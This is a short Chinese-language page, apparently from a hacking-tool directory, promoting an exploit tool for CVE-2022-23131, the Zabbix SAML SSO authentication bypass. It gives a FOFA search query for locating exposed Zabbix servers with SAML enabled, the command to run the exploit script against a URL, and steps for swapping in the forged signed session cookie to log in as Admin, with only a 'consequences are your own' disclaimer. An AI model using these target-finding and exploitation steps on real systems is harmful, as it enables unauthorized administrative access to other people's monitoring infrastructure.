黑客、渗透测试和网络安全工具,武装您的安全武器库!
针对 CVE-2022-23131 的利用工具,针对 Zabbix SAML SSO 认证绕过漏洞。生成签名会话 cookie 以获得未授权的管理员访问权限。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
FOFA
app="ZABBIX-监控系统" && body="saml"
运行
python cve-2022-23131.py https://www.example.com Admin
利用exp生成signed_session,替换cookie,再点击 Sign in with Single Sign-On (SAML) 默认是Admin
(尊重尺度,后果自负)
萍水相逢,致敬不甘平凡的平凡人